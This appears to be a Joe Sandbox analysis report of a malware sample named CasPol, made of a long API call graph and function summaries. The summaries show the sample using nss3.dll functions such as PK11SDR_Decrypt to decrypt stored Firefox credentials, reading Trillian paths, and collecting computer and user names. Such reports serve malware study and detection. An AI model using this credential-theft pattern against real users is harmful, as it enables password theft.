412192 6043->6102 6044->6036 6044->6037 6049 40c6a4 FreeLibrary 6050 40c6ad EnumResourceTypesA 6049->6050 6051 40c6d8 MessageBoxA 6050->6051 6052 40c6f0 6050->6052 6051->6044 6123 40c427 ??2@YAPAXI 6052->6123 6059 40c73a 6156 409167 memset 6059->6156 6060 40c74e 6161 40902b memset 6060->6161 6065 4077af 2 API calls 6067 40c762 6065->6067 6066 40c8b3 ??3@YAXPAX 6068 40c8d7 6066->6068 6069 40c8cb DeleteObject 6066->6069 6070 40c766 RegDeleteKeyA 6067->6070 6071 40c77b 6067->6071 6182 40733e free free 6068->6182 6069->6068 6070->6066 6071->6066 6074 40c7d5 CoInitialize 6071->6074 6166 40c5a4 6071->6166 6073 40c8e9 6183 407a7a 6073->6183 6181 40c3af RegisterClassA CreateWindowExA 6074->6181 6081 40c7e7 ShowWindow UpdateWindow LoadAcceleratorsA PostMessageA GetMessageA 6087 40c848 6081->6087 6088 40c8ad CoUninitialize 6081->6088 6082 40c7d3 6082->6074 6083 40c7a4 ??3@YAXPAX 6083->6068 6086 40c7c1 DeleteObject 6083->6086 6086->6068 6089 40c84e TranslateAccelerator 6087->6089 6091 40c871 IsDialogMessage 6087->6091 6092 40c87c IsDialogMessage 6087->6092 6088->6066 6089->6087 6090 40c8a0 GetMessageA 6089->6090 6090->6088 6090->6089 6091->6090 6091->6092 6092->6090 6093 40c88c TranslateMessage DispatchMessageA 6092->6093 6093->6090 6095 404da5 GetProcAddress 6094->6095 6096 404dcd 6094->6096 6097 404db5 6095->6097 6098 404dbe FreeLibrary 6095->6098 6100 404df4 6096->6100 6101 404ddd MessageBoxA 6096->6101 6097->6098 6098->6096 6099 404dc9 6098->6099 6099->6096 6100->6043 6101->6043 6103 40c692 6102->6103 6104 41219b LoadLibraryA 6102->6104 6106 410de1 GetCurrentProcess 6103->6106 6104->6103 6105 4121af GetProcAddress 6104->6105 6105->6103 6187 410daa 6106->6187 6109 410e02 GetLastError 6112 40c69f 6109->6112 6110 410e0a 6193 410d8a 6110->6193 6112->6049 6112->6050 6113 410e11 6114 410e36 6113->6114 6115 410e1d GetProcAddress 6113->6115 6117 410d8a LoadLibraryA 6114->6117 6115->6114 6116 410e2a LookupPrivilegeValueA 6115->6116 6116->6114 6118 410e4f 6117->6118 6119 410e53 GetProcAddress 6118->6119 6120 410e6d CloseHandle 6118->6120 6119->6120 6121 410e60 AdjustTokenPrivileges 6119->6121 6120->6112 6121->6120 6124 40c453 6123->6124 6125 40c461 ??2@YAPAXI 6124->6125 6126 40c478 6125->6126 6128 40c47d 6125->6128 6204 4092cc 6126->6204 6129 40c4b2 DeleteObject 6128->6129 6130 40c4bf 6128->6130 6129->6130 6196 406ae0 6130->6196 6132 40c4c4 6199 401000 6132->6199 6136 40c508 6137 40763d 6136->6137 6216 40733e free free 6137->6216 6141 40746b malloc memcpy free free 6144 407678 6141->6144 6142 407758 6150 407783 6142->6150 6240 40746b 6142->6240 6144->6141 6144->6142 6145 4076fc free 6144->6145 6144->6150 6217 407364 6144->6217 6232 406982 6144->6232 6145->6144 6149 407364 7 API calls 6149->6150 6229 407491 6150->6229 6151 4077af 6154 4077f5 6151->6154 6155 4077b7 6151->6155 6152 4077c7 _strcmpi 6152->6155 6153 4077de _strnicmp 6153->6155 6154->6059 6154->6060 6155->6152 6155->6153 6155->6154 6245 409141 6156->6245 6158 409196 6250 409068 6158->6250 6162 409141 3 API calls 6161->6162 6163 40905a 6162->6163 6274 408fbc 6163->6274 6280 403cb2 6166->6280 6170 40c5f1 6174 40c665 6170->6174 6283 40bbf0 memset GetModuleFileNameA strrchr 6170->6283 6171 40c5f6 6326 40c50e _strcmpi 6171->6326 6174->6082 6174->6083 6177 40c610 6305 40a8f2 6177->6305 6181->6081 6182->6073 6184 407a80 free 6183->6184 6185 407a87 6183->6185 6184->6185 6186 40733e free free 6185->6186 6186->6044 6188 410d8a LoadLibraryA 6187->6188 6189 410db5 6188->6189 6190 410db9 GetProcAddress 6189->6190 6191 410dda 6189->6191 6190->6191 6192 410dca 6190->6192 6191->6109 6191->6110 6192->6191 6194 410da6 6193->6194 6195 410d8f LoadLibraryA 6193->6195 6194->6113 6195->6113 6214 406a19 memset _mbscpy 6196->6214 6198 406af7 CreateFontIndirectA 6198->6132 6200 40102c 6199->6200 6201 401030 LoadIconA 6200->6201 6202 40100d strncat 6200->6202 6203 402c8f _mbscpy 6201->6203 6202->6200 6203->6136 6215 406d91 memset 6204->6215 6206 4092df ??2@YAPAXI 6207 4092f3 ??2@YAPAXI 6206->6207 6209 409314 ??2@YAPAXI 6207->6209 6211 409335 ??2@YAPAXI 6209->6211 6213 409356 6211->6213 6213->6128 6214->6198 6215->6206 6216->6144 6218 407372 strlen 6217->6218 6219 40737e 6217->6219 6218->6219 6220 407396 free 6219->6220 6221 40739f 6219->6221 6222 4073a9 6220->6222 6223 406982 3 API calls 6221->6223 6224 4073c2 6222->6224 6225 4073b9 free 6222->6225 6223->6222 6227 406982 3 API calls 6224->6227 6226 4073ce memcpy 6225->6226 6226->6144 6228 4073cd 6227->6228 6228->6226 6230 4074a1 6229->6230 6231 407497 free 6229->6231 6230->6151 6231->6230 6233 406989 malloc 6232->6233 6234 4069cf 6232->6234 6236 4069c5 6233->6236 6237 4069aa 6233->6237 6234->6144 6236->6144 6238 4069be free 6237->6238 6239 4069ae memcpy 6237->6239 6238->6236 6239->6238 6241 407482 6240->6241 6242 407476 free 6240->6242 6244 406982 3 API calls 6241->6244 6243 40748d 6242->6243 6243->6149 6244->6243 6263 4069e8 GetModuleFileNameA 6245->6263 6247 409147 strrchr 6248 409156 6247->6248 6249 409159 _mbscat 6247->6249 6248->6249 6249->6158 6264 414060 6250->6264 6255 408ca1 3 API calls 6256 4090b0 6255->6256 6257 408ca1 3 API calls 6256->6257 6258 4090bb EnumResourceNamesA EnumResourceNamesA _mbscpy memset 6257->6258 6259 409107 LoadStringA 6258->6259 6260 40911d 6259->6260 6260->6259 6262 409135 6260->6262 6271 408d0f _itoa 6260->6271 6262->6066 6263->6247 6265 409075 _mbscpy _mbscpy 6264->6265 6266 408ca1 6265->6266 6267 414060 6266->6267 6268 408cae memset GetPrivateProfileStringA 6267->6268 6269 408cf9 WritePrivateProfileStringA 6268->6269 6270 408d09 6268->6270 6269->6270 6270->6255 6272 408ca1 3 API calls 6271->6272 6273 408d41 6272->6273 6273->6260 6279 4069d3 GetFileAttributesA 6274->6279 6276 408fc5 6277 40902a 6276->6277 6278 408fca _mbscpy _mbscpy GetPrivateProfileIntA GetPrivateProfileStringA 6276->6278 6277->6065 6278->6277 6279->6276 6344 40955a 6280->6344 6284 40bc40 6283->6284 6285 40bc43 _mbscat _mbscpy _mbscpy 6283->6285 6284->6285 6383 4039a8 6285->6383 6287 40bcd4 6290 40bcf9 6287->6290 6398 402d81 6287->6398 6289 40bcc4 GetWindowPlacement 6289->6287 6391 40946f 6290->6391 6294 40b2f5 6295 40b370 6294->6295 6299 40b325 6294->6299 6556 40671b LoadCursorA SetCursor 6295->6556 6297 40b375 6300 4077af 2 API calls 6297->6300 6298 40b32c _mbsicmp 6298->6299 6299->6295 6299->6298 6557 40ae7d 6299->6557 6301 40b39b 6300->6301 6302 40b3e5 SetCursor 6301->6302 6304 40b3dc qsort 6301->6304 6302->6177 6304->6302 6306 40a906 6305->6306 6307 40972b 3 API calls 6305->6307 6308 40a917 GetStdHandle 6306->6308 6309 40a90e 6306->6309 6307->6306 6310 40a914 6308->6310 6574 4067d3 CreateFileA 6309->6574 6312 40aa25 6310->6312 6313 40a92d 6310->6313 6315 406830 9 API calls 6312->6315 6575 40671b LoadCursorA SetCursor 6313->6575 6316 40aa2e 6315->6316 6339 40bdcf 6316->6339 6317 40a93a 6318 40a97f 6317->6318 6324 40a999 6317->6324 6576 409f97 6317->6576 6318->6324 6582 409e6e 6318->6582 6321 40a9ce 6322 40aa17 SetCursor 6321->6322 6323 40aa0e CloseHandle 6321->6323 6322->6316 6323->6322 6324->6321 6592 406830 6324->6592 6327 40c523 _strcmpi 6326->6327 6328 40c51f 6326->6328 6329 40c534 6327->6329 6330 40c538 _strcmpi 6327->6330 6328->6170 6329->6170 6331 40c549 6330->6331 6332 40c54d _strcmpi 6330->6332 6331->6170 6333 40c562 _strcmpi 6332->6333 6334 40c55e 6332->6334 6335 40c573 6333->6335 6336 40c577 _strcmpi 6333->6336 6334->6170 6335->6170 6337 40c588 6336->6337 6338 40c58c _mbsicmp 6336->6338 6337->6170 6338->6170 6340 40bdf6 6339->6340 6341 40bdda 6339->6341 6340->6174 6608 4093d6 6341->6608 6343 40bdef ??3@YAXPAX 6343->6340 6356 409370 6344->6356 6347 4095be memcpy memcpy 6348 409618 6347->6348 6348->6347 6349 409656 ??2@YAPAXI ??2@YAPAXI 6348->6349 6351 40876f 12 API calls 6348->6351 6350 409692 ??2@YAPAXI 6349->6350 6353 4096c9 6349->6353 6350->6353 6351->6348 6353->6353 6366 4094da 6353->6366 6355 403cc1 _strcmpi 6355->6170 6355->6171 6357 409382 6356->6357 6358 40937b ??3@YAXPAX 6356->6358 6359 409390 6357->6359 6360 409389 ??3@YAXPAX 6357->6360 6358->6357 6361 4093a1 6359->6361 6362 40939a ??3@YAXPAX 6359->6362 6360->6359 6363 4093c1 ??2@YAPAXI ??2@YAPAXI 6361->6363 6364 4093b1 ??3@YAXPAX 6361->6364 6365 4093ba ??3@YAXPAX 6361->6365 6362->6361 6363->6347 6364->6365 6365->6363 6367 407491 free 6366->6367 6368 4094e3 6367->6368 6369 407491 free 6368->6369 6370 4094eb 6369->6370 6371 407491 free 6370->6371 6372 4094f3 6371->6372 6373 407491 free 6372->6373 6374 4094fb 6373->6374 6375 40746b 4 API calls 6374->6375 6376 40950e 6375->6376 6377 40746b 4 API calls 6376->6377 6378 409518 6377->6378 6379 40746b 4 API calls 6378->6379 6380 409522 6379->6380 6381 40746b 4 API calls 6380->6381 6382 40952c 6381->6382 6382->6355 6384 4039c8 6383->6384 6405 40d725 6384->6405 6386 403a14 memset sprintf 6388 403a49 6386->6388 6387 403a60 _strcmpi 6387->6388 6388->6386 6388->6387 6389 403ab1 6388->6389 6420 411ec1 6388->6420 6389->6287 6389->6289 6392 40947e 6391->6392 6394 40948c 6391->6394 6547 40923a 6392->6547 6395 4094d7 6394->6395 6396 4094c9 6394->6396 6395->6294 6552 4091aa 6396->6552 6399 402d90 6398->6399 6400 402e0a 6398->6400 6399->6400 6401 402dc4 GetSystemMetrics 6399->6401 6400->6290 6401->6400 6402 402dd8 GetSystemMetrics 6401->6402 6402->6400 6403 402de6 6402->6403 6403->6400 6404 402def SetWindowPos 6403->6404 6404->6400 6424 40d3a0 memset 6405->6424 6419 40d772 6419->6386 6421 411ee3 GetPrivateProfileStringA 6420->6421 6422 411ed4 WritePrivateProfileStringA 6420->6422 6423 411ef6 6421->6423 6422->6423 6423->6388 6425 411dae 3 API calls 6424->6425 6426 40d3e8 6425->6426 6427 40d422 6426->6427 6515 407139 strlen strlen 6426->6515 6428 40d46b memset 6427->6428 6490 41212c 6427->6490 6498 41223f 6428->6498 6437 40d4ce 6514 4069d3 GetFileAttributesA 6437->6514 6438 40d4bb 6528 406b4b _mbscpy 6438->6528 6440 40d412 6440->6427 6444 40d417 _mbscpy 6440->6444 6444->6427 6445 40d4db 6450 40d4e9 memset 6445->6450 6446 40d450 6527 4069d3 GetFileAttributesA 6446->6527 6448 40d458 6448->6428 6449 40d45e _mbscpy 6448->6449 6449->6428 6451 41223f 10 API calls 6450->6451 6452 40d529 strlen strlen 6451->6452 6453 40d55f 6452->6453 6454 40d54c 6452->6454 6542 4069d3 GetFileAttributesA 6453->6542 6455 406b4b 4 API calls 6454->6455 6455->6453 6457 40d56c 6458 40d607 memset 6457->6458 6459 41223f 10 API calls 6458->6459 6460 40d647 strlen strlen 6459->6460 6461 40d67d 6460->6461 6462 40d66a 6460->6462 6543 4069d3 GetFileAttributesA 6461->6543 6463 406b4b 4 API calls 6462->6463 6463->6461 6465 40d68a 6466 40d578 memset 6465->6466 6467 41223f 10 API calls 6466->6467 6468 40d5b8 strlen strlen 6467->6468 6469 40d5ee 6468->6469 6470 40d5db 6468->6470 6544 4069d3 GetFileAttributesA 6469->6544 6471 406b4b 4 API calls 6470->6471 6471->6469 6473 40d5fb 6474 40d696 memset 6473->6474 6475 41223f 10 API calls 6474->6475 6476 40d6d6 strlen strlen 6475->6476 6477 40d70c 6476->6477 6478 40d6f9 6476->6478 6545 4069d3 GetFileAttributesA 6477->6545 6479 406b4b 4 API calls 6478->6479 6479->6477 6481 40d719 6482 411dae 6481->6482 6546 411d68 RegOpenKeyExA 6482->6546 6484 40d76c 6489 4069d3 GetFileAttributesA 6484->6489 6485 411dc4 6485->6484 6486 411d82 RegQueryValueExA 6485->6486 6487 411dd9 RegCloseKey 6486->6487 6487->6484 6489->6419 6531 411d68 RegOpenKeyExA 6490->6531 6492 412149 6493 41216d 6492->6493 6532 411d82 RegQueryValueExA 6492->6532 6495 412172 GetWindowsDirectoryA _mbscat 6493->6495 6496 40d439 6493->6496 6495->6496 6520 40680e strlen 6496->6520 6499 412192 2 API calls 6498->6499 6500 412251 6499->6500 6501 412284 memset 6500->6501 6534 406b06 6500->6534 6502 4122a4 6501->6502 6537 411d68 RegOpenKeyExA 6502->6537 6506 412275 SHGetSpecialFolderPathA 6507 40d48f strlen strlen 6506->6507 6507->6437 6507->6438 6508 4122d1 6509 412304 _mbscpy 6508->6509 6538 4121c1 6508->6538 6509->6507 6511 4122e2 6512 411d82 RegQueryValueExA 6511->6512 6513 4122f9 RegCloseKey 6512->6513 6513->6509 6514->6445 6517 407165 6515->6517 6518 407186 6515->6518 6516 407169 _memicmp 6516->6517 6516->6518 6517->6516 6517->6518 6518->6427 6519 4069d3 GetFileAttributesA 6518->6519 6519->6440 6521 406819 6520->6521 6522 40682d 6520->6522 6521->6522 6523 406820 _mbscat 6521->6523 6524 406958 strlen 6522->6524 6523->6522 6525 406969 6524->6525 6526 40696c memcpy 6524->6526 6525->6526 6526->6446 6527->6448 6529 40680e 2 API calls 6528->6529 6530 406b5d _mbscat 6529->6530 6530->6437 6531->6492 6533 411da5 RegCloseKey 6532->6533 6533->6493 6535 406b15 GetVersionExA 6534->6535 6536 406b26 6534->6536 6535->6536 6536->6501 6536->6506 6537->6508 6541 4121c6 6538->6541 6539 412233 _mbscpy 6539->6511 6540 412216 6540->6511 6541->6539 6541->6540 6542->6457 6543->6465 6544->6473 6545->6481 6546->6485 6548 409248 memset 6547->6548 6551 4092a0 6547->6551 6549 40925f 6548->6549 6548->6551 6550 409260 SendMessageA 6549->6550 6549->6551 6550->6549 6551->6394 6553 409234 6552->6553 6554 4091b8 6552->6554 6553->6395 6554->6553 6555 4091fd SendMessageA 6554->6555 6555->6554 6556->6297 6567 40972b ??2@YAPAXI 6557->6567 6559 40ae8b 6560 40aee2 6559->6560 6561 40aea2 strlen 6559->6561 6562 40aef6 _mbsicmp _mbsicmp 6560->6562 6566 40af50 6560->6566 6561->6560 6563 40aeae atoi 6561->6563 6562->6560 6565 40aebf 6563->6565 6564 407139 strlen strlen _memicmp 6564->6566 6565->6299 6566->6564 6566->6565 6568 4097d5 ??3@YAXPAX 6567->6568 6571 409762 6567->6571 6568->6559 6571->6568 6572 40501f SendMessageA 6571->6572 6573 40504d 6572->6573 6573->6571 6574->6310 6575->6317 6577 409fe3 6576->6577 6581 409f9f 6576->6581 6597 4067ec strlen WriteFile 6577->6597 6579 409ff1 6579->6318 6580 4067ec strlen WriteFile 6580->6581 6581->6577 6581->6580 6583 409f82 6582->6583 6590 409e83 6582->6590 6598 4067ec strlen WriteFile 6583->6598 6585 409f90 6585->6324 6586 409ead strchr 6587 409ebb strchr 6586->6587 6586->6590 6587->6590 6588 4074fa 7 API calls 6588->6590 6589 4067ec strlen WriteFile 6589->6590 6590->6583 6590->6586 6590->6588 6590->6589 6591 407491 free 6590->6591 6591->6590 6593 406840 GetLastError 6592->6593 6594 406848 6592->6594 6593->6594 6599 406735 6594->6599 6597->6579 6598->6585 6600 406752 LoadLibraryExA 6599->6600 6601 406769 FormatMessageA 6599->6601 6600->6601 6602 406764 6600->6602 6603 406782 strlen 6601->6603 6604 4067a7 _mbscpy 6601->6604 6602->6601 6606 40679c LocalFree 6603->6606 6607 40678f _mbscpy 6603->6607 6605 4067b6 sprintf MessageBoxA 6604->6605 6605->6321 6606->6605 6607->6606 6609 409370 5 API calls 6608->6609 6610 4093e4 6609->6610 6611 4093f7 6610->6611 6612 407491 free 6610->6612 6613 40940a 6611->6613 6615 407491 free 6611->6615 6614 4093f0 ??3@YAXPAX 6612->6614 6616 40941d 6613->6616 6618 407491 free 6613->6618 6614->6611 6617 409403 ??3@YAXPAX 6615->6617 6619 407491 free 6616->6619 6620 409430 free 6616->6620 6617->6613 6621 409416 ??3@YAXPAX 6618->6621 6622 409429 ??3@YAXPAX 6619->6622 6620->6343 6621->6616 6622->6620 8067 411e9a 8070 411c8f 8067->8070 8071 411c9c 8070->8071 8072 411ce6 memset GetPrivateProfileStringA 8071->8072 8073 411cab memset 8071->8073 8078 406fa6 strlen 8072->8078 8083 406f2d 8073->8083 8077 411d2f 8079 406fba 8078->8079 8081 406fbc 8078->8081 8079->8077 8080 407003 8080->8077 8081->8080 8087 406d5a strtoul 8081->8087 8084 406f96 WritePrivateProfileStringA 8083->8084 8085 406f3e 8083->8085 8084->8077 8085->8084 8086 406f45 sprintf memcpy 8085->8086 8086->8084 8086->8085 8087->8081 8301 41051f _wcsnicmp 8302 41059a 8301->8302 8303 41054a 8301->8303 8306 40fd01 memset memset 8303->8306 8305 410553 WideCharToMultiByte WideCharToMultiByte 8305->8302 8306->8305 5992 414db1 5993 414dc8 5992->5993 5996 414e36 5992->5996 5993->5996 5999 414df0 5993->5999 5995 414de7 5995->5996 5997 414e17 VirtualProtect 5995->5997 5997->5996 5998 414e26 VirtualProtect 5997->5998 5998->5996 6000 414df5 5999->6000 6005 414e36 6000->6005 6006 414e0d 6000->6006 6002 414dfe 6003 414e17 VirtualProtect 6002->6003 6002->6005 6004 414e26 VirtualProtect 6003->6004 6003->6005 6004->6005 6007 414e13 6006->6007 6008 414e17 VirtualProtect 6007->6008 6010 414e36 6007->6010 6009 414e26 VirtualProtect 6008->6009 6008->6010 6009->6010 8066 4067ba CreateFileA

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00407898 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                  • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 379999529-0
                                                                                                                                                                                  • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                  • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                                                                                                                                                                  Function 00410C4C Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                    • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                    • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                    • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                    • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                  • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                    • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                    • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                  • API String ID: 2719586705-3659000792
                                                                                                                                                                                  • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                  • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                  • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                                                                                                                                                                  Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 108 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 109 407dc4 108->109 110 407df8-407dfb 108->110 111 407dca-407dd3 109->111 112 407e2c-407e30 110->112 113 407dfd-407e06 110->113 114 407dd5-407dd9 111->114 115 407dda-407df6 111->115 116 407e08-407e0c 113->116 117 407e0d-407e2a 113->117 114->115 115->110 115->111 116->117 117->112 117->113
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                  • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                  • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                  • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                                                                                  • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                  • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                                                                                                                                                                  Function 004064FB Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 118 4064fb-40651b call 410c4c 121 406521-406555 memset call 406958 118->121 122 4066d9-4066e0 118->122 125 406563 121->125 126 406557-406561 121->126 127 406566-406568 125->127 126->127 128 4066d4 call 410d6f 127->128 129 40656e-4065d3 memset * 3 strlen * 2 127->129 128->122 131 4065d5-4065e6 call 406b4b 129->131 132 4065e8 129->132 135 4065ef-40660c strlen * 2 131->135 132->135 137 406621 135->137 138 40660e-40661f call 406b4b 135->138 140 406628-406645 strlen * 2 137->140 138->140 142 406647-406658 call 406b4b 140->142 143 40665a 140->143 144 406661-406670 call 4069d3 142->144 143->144 149 406681-406690 call 4069d3 144->149 150 406672-40667c call 4062db 144->150 154 4066a1-4066b0 call 4069d3 149->154 155 406692-40669c call 4062db 149->155 150->149 159 4066c1-4066d0 154->159 160 4066b2-4066bc call 4062db 154->160 155->154 159->128 161 4066d2 159->161 160->159 161->128
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                    • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                    • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                    • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                    • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                    • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                  • memset.MSVCRT ref: 00406537
                                                                                                                                                                                    • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                    • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                  • memset.MSVCRT ref: 0040657E
